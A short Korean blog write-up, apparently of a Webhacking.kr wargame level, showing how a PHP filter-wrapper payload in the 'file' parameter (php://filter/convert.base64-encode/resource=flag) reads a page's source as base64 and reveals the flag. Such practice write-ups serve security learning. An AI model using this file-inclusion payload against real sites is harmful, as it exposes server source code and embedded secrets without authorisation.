문제서버에서 file=flag를 입력하면 플래그는 코드에 있다는 문구가 출력됩니다. 코드를 읽기 위해서는 PHP Wrapper를 사용할 수 있습니다. 코드는 아래와 같습니다.
http://webhacking.kr:10001/?file=php://filter/convert.base64-encode/resource=flag
동작방식은 file에 flag를 넣어서 나오는 페이지의 코드를 base64로 인코딩해서 출력하는 것으로 추측할 수 있습니다.
base 64를 디코딩하면 아래와 같습니다.
<?php
echo "FLAG is in the code";
$flag = "FLAG{this_is_your_first_flag}";
?>
'웹 해킹 > Webhacking.kr' 카테고리의 다른 글
| [Webhacking.kr] old-27 (0) | 2021.09.08 |
|---|---|
| [Webhacking.kr] old-19 (0) | 2021.09.07 |
| [Webhacking.kr] old-39 (0) | 2021.09.07 |
| [Webhacking.kr] old-54 (0) | 2021.09.06 |
| [Webhacking.kr] old-38 (0) | 2021.09.05 |
댓글